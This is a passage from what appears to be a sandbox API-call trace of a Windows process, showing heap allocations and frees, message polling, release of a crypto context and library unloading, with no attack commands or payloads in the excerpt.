lpMsg=0x8cf140) returned 0 [0259.721] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0259.721] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0259.721] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.721] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0259.721] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.721] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0259.722] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0259.722] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0259.722] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.722] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0259.722] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0259.722] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.722] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0259.722] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0259.722] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0259.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0259.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0259.722] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0259.723] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0259.723] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0259.723] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69ac8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0259.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0259.723] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0259.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0259.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e518f8 [0259.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0259.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0259.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0259.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0259.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0259.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0259.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0259.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0259.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0259.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0259.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0259.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0259.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0259.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0259.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0259.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0259.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0259.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0259.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0259.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0259.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0259.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0259.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0259.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0259.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0259.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0259.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0259.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0259.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0259.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0259.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0259.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0259.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0259.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0259.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0259.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0259.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0259.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0259.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0259.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0259.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0259.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0259.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0259.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0259.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0259.724] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0259.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0259.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0259.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0259.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0259.725] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0259.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0259.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0259.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519b8 [0259.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0259.725] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0259.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0259.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0259.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0259.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0259.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0259.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0259.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0259.725] FreeLibrary (hLibModule=0x756e0000) returned 1 [0259.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0259.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0259.725] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0259.725] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0259.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0259.725] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0259.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0259.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0259.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0259.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0259.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0259.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0259.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0259.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0259.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51820 [0259.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51670 [0259.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e516a0 [0259.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0259.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51838 [0259.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0259.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0259.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51730 [0259.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0259.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0259.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0259.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0259.726] CloseHandle (hObject=0x2a0) returned 1 [0259.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0259.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0259.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be08a8 | out: hHeap=0x970000) returned 1 [0259.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0259.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0259.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0259.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0259.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0259.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0259.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0259.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0259.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0259.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0259.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0259.728] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0259.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0259.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0259.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0259.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0259.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0259.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0259.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0259.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0259.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e517f0 [0259.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51820 [0259.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51838 [0259.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0259.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51898 [0259.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0259.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0259.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e515f8 [0259.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0259.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0259.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0259.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0259.729] CloseHandle (hObject=0x2d0) returned 1 [0259.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0259.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0259.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04008 | out: hHeap=0x970000) returned 1 [0259.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0259.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0259.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0259.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0259.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0259.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0259.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0259.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0259.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0259.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0259.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0259.732] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0259.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0259.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0259.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0259.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0259.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0259.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0259.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0259.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0259.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0259.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0259.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0259.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0259.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0259.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0259.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0259.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0259.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf08b0 | out: hHeap=0x970000) returned 1 [0259.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0259.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0259.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0259.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0259.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0259.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0259.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0259.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0259.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0259.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0259.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0259.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0259.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0259.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0259.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0259.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0259.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0259.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0259.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0259.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0259.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0259.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0259.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0259.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0259.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0259.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0259.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0259.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0259.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0259.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0259.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0259.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0259.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0259.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0259.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0259.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0259.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0259.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0259.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: 